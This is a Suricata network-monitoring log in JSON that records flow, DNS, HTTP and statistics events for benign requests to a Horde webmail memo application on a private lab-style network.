{"timestamp":"2020-02-29T00:17:53.002632+0000","flow_id":363769459871467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1154,"bytes_toclient":654,"start":"2020-02-29T00:16:47.167659+0000","end":"2020-02-29T00:16:52.301912+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:59.499151+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27338,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:59.702081+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:18:00.000341+0000","event_type":"stats","stats":{"uptime":14732,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2439,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":88251,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:00.001510+0000","flow_id":859365721232905,"event_type":"flow","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:59.579081+0000","end":"2020-02-29T00:12:59.687284+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:03.353729+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:03.630319+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319}} 
{"timestamp":"2020-02-29T00:18:04.703159+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52770,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:18:06.824223+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61183,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":15,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:07.000351+0000","event_type":"stats","stats":{"uptime":14739,"capture":{"kernel_packets":136428,"kernel_drops":0},"decoder":{"pkts":136435,"bytes":93767765,"invalid":192,"ipv4":134904,"ipv6":10,"ethernet":136435,"raw":0,"null":0,"sll":0,"tcp":129487,"udp":5210,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2806,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2822,"synack":2813,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1843,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2384,"failed_udp":112},"tx":{"http":4710,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2464}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2440,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19509,"memcap_state":0,"memcap_global":0},"http":{"memuse":161241,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:07.317763+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29394,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:07.516716+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606}} {"timestamp":"2020-02-29T00:18:08.001099+0000","flow_id":1204526473524166,"event_type":"flow","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:07.308166+0000","end":"2020-02-29T00:13:07.416966+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:08.631175+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34868,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35058,"tx_id":0}} {"timestamp":"2020-02-29T00:18:10.771454+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8098,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:10.964330+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935}} {"timestamp":"2020-02-29T00:18:11.000525+0000","flow_id":1491443173997920,"event_type":"flow","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:10.769376+0000","end":"2020-02-29T00:13:10.877835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000727+0000","flow_id":1108070098154454,"event_type":"flow","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.603094+0000","end":"2020-02-29T00:13:10.711700+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000795+0000","flow_id":969226690410159,"event_type":"flow","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.177839+0000","end":"2020-02-29T00:13:10.286032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.152034+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25116,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:11.146917+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":208,"tx_id":1}} {"timestamp":"2020-02-29T00:18:11.398435+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61759,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:18:11.621320+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780}} {"timestamp":"2020-02-29T00:18:12.004506+0000","flow_id":682082356943433,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:13:11.449097+0000","end":"2020-02-29T00:13:11.561870+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:12.519018+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34870,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:13.000312+0000","flow_id":1019705441143674,"event_type":"flow","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:12.019322+0000","end":"2020-02-29T00:13:12.127791+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:14.000266+0000","event_type":"stats","stats":{"uptime":14746,"capture":{"kernel_packets":136484,"kernel_drops":0},"decoder":{"pkts":136500,"bytes":93793921,"invalid":192,"ipv4":134969,"ipv6":10,"ethernet":136500,"raw":0,"null":0,"sll":0,"tcp":129542,"udp":5220,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2809,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2825,"synack":2816,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1846,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2389,"failed_udp":112},"tx":{"http":4715,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2469}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2445,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checke
d":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":140340,"memcap":0}}} {"timestamp":"2020-02-29T00:18:15.965065+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34872,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":21692,"tx_id":0}} {"timestamp":"2020-02-29T00:18:16.581122+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":31043,"tx_id":2}} {"timestamp":"2020-02-29T00:18:17.555596+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15870,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 